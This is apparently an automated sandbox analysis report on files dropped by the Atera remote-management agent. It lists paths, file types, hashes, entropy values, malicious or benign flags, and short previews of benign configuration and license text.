                                                                                                                                                                                                                                                                                              SHA-512:77E31EC0DCA4E4895D3A4C0E84C6C1516D94089763F1735CAC150EFCD4EEC36107BB810E24D94C1208B7A80881D858DBFE887B32DA6F6D8F0C48F21C2525D0BE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):150
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.731888600769331
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:vFWWMNHU8LdgCQcIMOofoObWNRXGws8FLu+gNlFueRObK4QIMOn:TMVBd1IGPKNxgUaNNu5W4QIT
                                                                                                                                                                                                                                                                                              MD5:E9AD5DD7B32C44F8A241DE0E883D7733
                                                                                                                                                                                                                                                                                              SHA1:034C69B120C514AD9ED83C7BAD32624560E4B464
                                                                                                                                                                                                                                                                                              SHA-256:9B250C32CBEC90D2A61CB90055AC825D7A5F9A5923209CFD0625FCA09A908D0A
                                                                                                                                                                                                                                                                                              SHA-512:BF5A6C477DC5DFEB85CA82D2AED72BD72ED990BEDCAF477AF0E8CAD9CDF3CFBEBDDC19FA69A054A65BC1AE55AAF8819ABCD9624A18A03310A20C80C116C99CC4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <enforceFIPSPolicy enabled="false"/>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.721635609555772
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:SZdFVJMXLreqXy1Wfardzl7BZyOX35++n:Sls/t+WfKj+OXV
                                                                                                                                                                                                                                                                                              MD5:A10B78183254DA1214DD51A5ACE74BC0
                                                                                                                                                                                                                                                                                              SHA1:5C9206F667D319E54DE8C9743A211D0E202F5311
                                                                                                                                                                                                                                                                                              SHA-256:29472B6BE2F4E7134F09CC2FADF088CB87089853B383CA4AF29C19CC8DFC1A62
                                                                                                                                                                                                                                                                                              SHA-512:CAE9F800DA290386DE37BB779909561B4EA4CC5042809E85236D029D9125B3A30F6981BC6B3C80B998F727C48EB322A8AD7F3B5FB36EA3F8C8DD717D4E8BE55E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:CheckSum is licensed as Apache v2 - https://raw.github.com/ferventcoder/checksum/master/LICENSE
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):565672
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0581002983018335
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:hjgGwLGK4Uk0Ycoi6DdP51S2XI5cgGlKFTvr5pgx1v9/oLUmP9nVy:h7wj4kYcopdPm2ac8+1vVmPHy
                                                                                                                                                                                                                                                                                              MD5:F7B6AA803BE23C3192FCC2058D208F44
                                                                                                                                                                                                                                                                                              SHA1:A9569D1A4948FD33D388BB263B5CFF0D66E3BB34
                                                                                                                                                                                                                                                                                              SHA-256:D489923F1F91954B8AA15CD0E763132B9033780481D850D74395F5AB6E266C7C
                                                                                                                                                                                                                                                                                              SHA-512:7FD6E1B291503AC9A67128BAC2D6C8F21B40CE9DE99E015866FC62C79CBBAFCD25F3F43A0EB77A00B20C1D6BE9504E85458D503647BF2CF93BC71DAFB64AF122
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3758
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.882012677800436
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:wwVl/ldfbBaq9k4KM8da2J7LbyM71wKPC/:rVl/ldfsn4KM8daU7LP5wn/
                                                                                                                                                                                                                                                                                              MD5:89AC7C94D1013F7B3E32215A3DB41731
                                                                                                                                                                                                                                                                                              SHA1:1511376E8A74A28D15BB62A75713754E650C8A8D
                                                                                                                                                                                                                                                                                              SHA-256:D4D2EF2C520EC3E4ECFF52C867EBD28E357900E0328BB4173CB46996DED353F4
                                                                                                                                                                                                                                                                                              SHA-512:9BA2B0029E84DE81FFEF19B4B17A6D29EE652049BB3152372F504A06121A944AC1A2B1B57C6B0447979D5DE9A931186FEF9BD0667D5358D3C9CB29B817533792
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:Shim Generator - shimgen.exe..Copyright (C) 2017 - Present Chocolatey Software, Inc ("CHOCOLATEY")..Copyright (C) 2013 - 2017 RealDimensions Software, LLC ("RDS")..===================================================================..Grant of License..===================================================================..ATTENTION: Shim Generator ("shimgen.exe") is a closed source application with..a proprietary license and its use is strictly limited to the terms of this ..license agreement.....RealDimensions Software, LLC ("RDS") grants Chocolatey Software, Inc a revocable, ..non-exclusive license to distribute and use shimgen.exe with the official ..Chocolatey client (https://chocolatey.org). This license file must be stored in ..Chocolatey source next to shimgen.exe and distributed with every copy of ..shimgen.exe. The distribution or use of shimgen.exe outside of these terms ..without the express written permission of RDS is strictly prohibited.....While the source for shimgen.exe is
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1185456
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999660178690134
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:24576:Ssoja9MaLduouhVlf0tyv29r1+IdjkaCgs54gvUokF4fEFBb:HoFOJuhV+tyor1+I+aqdM2MFBb
                                                                                                                                                                                                                                                                                              MD5:6C6F85E896655A6EB726482F04C49086
                                                                                                                                                                                                                                                                                              SHA1:2E0C55CD4894117428B34D21A1D53738FCE4B02C
                                                                                                                                                                                                                                                                                              SHA-256:E109400A93FEDE90201BBF37C1868C789888BCE9D03A4AE5B46C48599939C34E
                                                                                                                                                                                                                                                                                              SHA-512:B58303C149DEFFC9E374D5BA42A8A73B7CE890D35F9589FE0B09ACEC541A21D589D49FA5086B965277FA22DFE308357505124F13A6FF1E0DE415EBC40CE61E15
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):55344
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.139210251385105
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:N2Xj3YqBmARWhNqjxcVqnOvdBsqW/BCiFl0scb/MV7Hx/:wX5BqSBjb0tb/MVJ
                                                                                                                                                                                                                                                                                              MD5:77C613FFADF1F4B2F50D31EEEC83AF30
                                                                                                                                                                                                                                                                                              SHA1:76A6BFD488E73630632CC7BD0C9F51D5D0B71B4C
                                                                                                                                                                                                                                                                                              SHA-256:2A0EAD6E9F424CBC26EF8A27C1EED1A3D0E2DF6419E7F5F10AA787377A28D7CF
                                                                                                                                                                                                                                                                                              SHA-512:29C8AE60D195D525650574933BAD59B98CF8438D47F33EDF80BBDF0C79B32D78F0C0FEBE69C9C98C156F52219ECD58D7E5E669AE39D912ABE53638092ED8B6C3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2010
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.013965898836397
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3rrb7O7Rgdp+1/gYoSagFsg+w3Sg+Cag+XgjdgDt:7rne4wCNj
                                                                                                                                                                                                                                                                                              MD5:0B17B3BE9B3A6F6879998D280941DE55
                                                                                                                                                                                                                                                                                              SHA1:EDE825B51EE11AF7C9221DCE596BB969CD068529
                                                                                                                                                                                                                                                                                              SHA-256:1D69336E421C535CECF2E0326BE39B44EEC8EA39754AC8E855D8E0368E0F4619
                                                                                                                                                                                                                                                                                              SHA-512:06D9CC03B8F7295A6E02376159EA96A83CAED4B584769370C0BF365B25D29C883BA5C8359CFEB7316D13C93B49FD37CCA267F6E7931220CED71435E1F4B639C8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                                                                              MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                                                                              SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                                                                              SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                                                                              SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=1.6
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):93232
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.195903304850222
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:zSvbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hx9:zS8UMW+BV5M+5Nn0kom/RS3
                                                                                                                                                                                                                                                                                              MD5:B969BFF44179BF8A3584EEB9E026CAE1
                                                                                                                                                                                                                                                                                              SHA1:DBA7A528F51870B89AED549E81EF0660F43B2943
                                                                                                                                                                                                                                                                                              SHA-256:5EE05D3796AB12ECF7F2D32D48D41D2A2A3FD257AD8456A0EBD5E6019492ECF1
                                                                                                                                                                                                                                                                                              SHA-512:F0643905258D2C09CA0A6C30A0A9AD5AD2FE184A65B7FFA5B7B731FEE8357672B35246626A10B39DF7C18EF1B75328192495685DDF9CD2F524E913D6A2993E18
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95280
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.998418289121845
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6iLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7HxlF:/Z0PMcjrgF
                                                                                                                                                                                                                                                                                              MD5:3AB0B86F5D058374AC789F05FB6C6E81
                                                                                                                                                                                                                                                                                              SHA1:4C8142A6EA10F48735429B125ADC278178FA0082
                                                                                                                                                                                                                                                                                              SHA-256:5F773968BD0501D91C4AE1339D248B4F766C39885B35088953AFB1BE6FBCC4E8
                                                                                                                                                                                                                                                                                              SHA-512:1A6CC62361FDD20A99D9551E677269D9D67B6F4B66C09083E07AE5732C23FFE15A5E687437A16A27896A19DECEB9F23D7614B6CC44445C365E3A59DED1AEE6E2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16432
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6559468525212
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:wXh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl55qz:wXh+tYmNyb8E9VF6IYinAM+oCaF5qz
                                                                                                                                                                                                                                                                                              MD5:8E2D0F47E477FAE8132492A31B26F1B3
                                                                                                                                                                                                                                                                                              SHA1:6C3EB7CB1D5E942DC6A62767A701D201E2F69CE1
                                                                                                                                                                                                                                                                                              SHA-256:7C8CD3B61286AAC09534541EDBFF10618938236830167581BD3E922CA55A1456
                                                                                                                                                                                                                                                                                              SHA-512:B40EA70361F5AFCCB3DC41D38A4F302AEE00B9AAC206AD2DFBD1591A7722AF732BC820C3C66EA3BC0816D4C98E364D1345077EDC786ED19135659AC91E0CFC06
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):75312
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.23943595769723
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Tu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYH:KF+qo7mDEwj4NXLGcfgruFcg7HxRt
                                                                                                                                                                                                                                                                                              MD5:D5B69F2C4F5CB0E7D43D7F6C1C87DC7E
                                                                                                                                                                                                                                                                                              SHA1:98FDA78C049D650E47C17D9072E82D87C1B59E9F
                                                                                                                                                                                                                                                                                              SHA-256:6C1325D183C7CC3E516628921005F18BB5A191B0029AF93DFB022CA4C2ABBAE9
                                                                                                                                                                                                                                                                                              SHA-512:D95C5CD5E9DAC57FA9C5DE8645F637363A5E787A8C521B09BFBEA56D01765F4FC31E4080BDCAD28BBD90FDB9BEE1CAB50E95FF13CFAC728405D87C3EFE3A387B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):52272
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.4113040933608225
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:TQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAMU:T9ML8LW/usybGYVE8mZw+89Wu1e7Hxav
                                                                                                                                                                                                                                                                                              MD5:94B12931B9032E80157DC27422393FEC
                                                                                                                                                                                                                                                                                              SHA1:2B762FCA27538B55ACF736F7D65E293E5F15EAEA
                                                                                                                                                                                                                                                                                              SHA-256:746AD9902D9310CC2F172736AC156018ECD3843BA58C8337DE017074B06CD645
                                                                                                                                                                                                                                                                                              SHA-512:D943A39FDD74627514818DAF3434BD1ABEB4EE10077E8B10414098DDA2972851795A15CBD4CAD73A67D5171446E4A6D844CDF8BD705E72F34B7DA16678097BE9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):398896
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1343664856235245
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:5jS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvM:5+e55LgIkTmyAAfTnMLvM
                                                                                                                                                                                                                                                                                              MD5:FACA1B5218F8EB76963366A6842E122D
                                                                                                                                                                                                                                                                                              SHA1:41B281ABA7D7FE994EE6C77F7F71042885919EC0
                                                                                                                                                                                                                                                                                              SHA-256:D779F3514666734455B5B2B7AEB035F7E1D7394CD445E332DD4D236E24D5C94E
                                                                                                                                                                                                                                                                                              SHA-512:8F350CB3D0C13A701C67749E103B1E07EE1E2EF8EFE71B70CC728F8E21DC02922BAB241CA256695DAC9B225D450623E9F8DA055EA062E336D7F1CD9D2A3FB6D9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1409
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.992215339808616
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dNQjY8L2PRRkMYaWcvJ9AwcPGnJg8vQpyriEWZoEs4h:cb8MRRkMVB9AwVbIQdsoEf
                                                                                                                                                                                                                                                                                              MD5:766E089F9AF0DAD5BFD8B77167D1E0FD
                                                                                                                                                                                                                                                                                              SHA1:0AD55E6BA596EFEB24867DC9FDCE4B3D2F2D904F
                                                                                                                                                                                                                                                                                              SHA-256:1D95ED644BB7D706E5B8EBDCB875B23F8B21C62C53C701EB8B3385F770808D7E
                                                                                                                                                                                                                                                                                              SHA-512:FD8ECF32094577A51579911AC3722D839A7B0874146B909EB8DC944CDB5DA459BFCF7EB64B47EC08F40515E6C38B4C4CBA1F4D9F9EB403E891A8710310DBAECA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<nlog xmlns="http://www.nlog-project.org/schemas/NLog.xsd".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xsi:schemaLocation="http://www.nlog-project.org/schemas/NLog.xsd NLog.xsd".. autoReload="true".. throwExceptions="false".. internalLogLevel="Off" internalLogFile="c:\temp\nlog-internal.log">.... optional, add some variables.. https://github.com/nlog/NLog/wiki/Configuration-file#variables.. -->.. <variable name="myvar" value="myvalue"/>.... .. See https://github.com/nlog/nlog/wiki/Configuration-file.. for information on customizing logging rules and outputs... -->.. <targets>.... .. add your targets here.. See https://github.com/nlog/NLog/wiki/Targets for possible targets... See https://github.com/nlog/NLog/wiki/Layout-Renderers for the possible layout renderers... -->.... .. Write events to a file with the date in the filename... <target xsi:type="File" na
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883760
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.071504659955744
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:V1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQJ:V1n1p9LdRN39aQZUqM
                                                                                                                                                                                                                                                                                              MD5:17A183A03C34B8EC1C91B3DD0B50E022
                                                                                                                                                                                                                                                                                              SHA1:7D226520BE51BD71D05D7EB56793233794F87DA4
                                                                                                                                                                                                                                                                                              SHA-256:381278035C5A8A4668D31B12F0BF3DEC6544E9668FED84DA038A8D21D233D72D
                                                                                                                                                                                                                                                                                              SHA-512:AD5591F6B90A07C00F10EF19231BB3C766E9E27C2205AB3A32C15B7D0DE0F732A5600665E4302290C771F06370B23E4FF0AC63E51C1F36899F98CCB6BD5F8C01
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960370699367048
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:hBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUW:hBA/ZTvQD0XY0AJBSjRlXP36RMGj
                                                                                                                                                                                                                                                                                              MD5:53D8AD0BCDED36C2EEBD4D3C45A60BD7
                                                                                                                                                                                                                                                                                              SHA1:9289840CB0518AF183BB41AB05428A6415B92AAE
                                                                                                                                                                                                                                                                                              SHA-256:07A068EF96EE5F447282B42B1818FDFC372B674893E6742A5F83DDBC4DF13ACD
                                                                                                                                                                                                                                                                                              SHA-512:41B19112B6CCE405E16153354223F4AFF548E9F55EDFDC158588E78D9EAA755E10865D7220B916EC14DAB4181C55C005B161B44AC011419EE85EFF5F65975523
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):284208
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.11766612253341
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:IZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHex:Ogo0WPVTXgk
                                                                                                                                                                                                                                                                                              MD5:D1BA01295CAEFA1F00261AAA943FFDBC
                                                                                                                                                                                                                                                                                              SHA1:54BE9D6F121721542E1B563804766592C9EBF14E
                                                                                                                                                                                                                                                                                              SHA-256:F425945B4D1BD5D65776EE4FF4330F33947692EA5E797EDA3103B6E380196BAF
                                                                                                                                                                                                                                                                                              SHA-512:DFFE1F15F635FD9C083B51C66DBE5C5C9B16516B8CA036B262765279FBF01FC521D10AE31288CA3FB5DAD4F8B6E744DDA33FB8698267C40970DCA9409178E067
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22064
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.678784612747097
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqpx:tuhMaVmzDC67EpYinAMxCJ
                                                                                                                                                                                                                                                                                              MD5:35082EAB5825C9A9D021B5B97BE382B2
                                                                                                                                                                                                                                                                                              SHA1:4716CBD843C8A2A1AA7ED7C95700672E9A863674
                                                                                                                                                                                                                                                                                              SHA-256:B91E3FA4C89230B668EE2DE7D6824DAB708B981F1AE94E734445154BC8A3F6EC
                                                                                                                                                                                                                                                                                              SHA-512:9F0FFB52E060910662AE7AA020AE836119BC609B3E0E9367C7C9D2F2975FC1DDEB1EC1B2F708704C22D666E778B787679BEE5A3CAB5868C09CCB5B57C9026BA2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):97328
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2419469146373485
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:3NSbHB6zBedWp71O37rGMsQ5gbDnTE8iayI2Sf+Ku6JhbDEhr4WTJ7HxQ:3N3OWMsQ56vd2s+KuYc9RTJa
                                                                                                                                                                                                                                                                                              MD5:9F59EFE4EE7BFF13F5866311048A6A80
                                                                                                                                                                                                                                                                                              SHA1:1F20929EE2BCC0BE40848CC739C6F31CAD13DA69
                                                                                                                                                                                                                                                                                              SHA-256:32FB947BAD722480938922DC363DB76AB0079383C6D732B4998C302B03D87200
                                                                                                                                                                                                                                                                                              SHA-512:CCCAAF2396AD1307AF0B51B424005BFB350508059CD9CF3E9641D396CCA3EC4C22EFB0329DF0AFD0B3888E07559B6904A0361B85A80A527CD3139161CFF91DAA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
